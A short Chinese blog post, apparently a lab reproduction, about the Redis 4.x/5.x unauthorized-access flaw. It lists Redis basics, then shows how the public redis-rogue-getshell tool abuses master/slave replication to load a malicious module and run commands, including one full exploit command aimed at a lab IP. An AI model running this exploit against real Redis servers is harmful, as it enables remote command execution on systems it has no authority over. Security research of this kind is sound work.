Loading

Redis 4.x/5.x 未授权访问漏洞

基本知识

  • Redis非关系型数据库,
  • 默认开放端口是6379端口,
  • 配置文件位置为 /etc/redis/redis.conf
  • Redis 的数据存于内存中,所以读写速度非常快,被广泛应用于缓存方向
  • 高性能的key-value存储系统
  • Redis默认是不需要账号密码
    存在未授权访问漏洞
    image

漏洞介绍

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

漏洞复现

  • exp
    https://github.com/vulhub/redis-rogue-getshell

  • 编译
    image

  • 查看帮助信息
    image

  • 利用

┌──(root㉿kali)-[/home/roott/桌面/redis-rogue-getshell-master]
└─# python3 redis-master.py -r 192.168.1.9 -p 6379 -L 192.168.1.9 -f RedisModulesSDK/exp.so -c "id"

image

posted @ 2022-04-22 13:29  5rem  阅读(102)  评论(0)    收藏  举报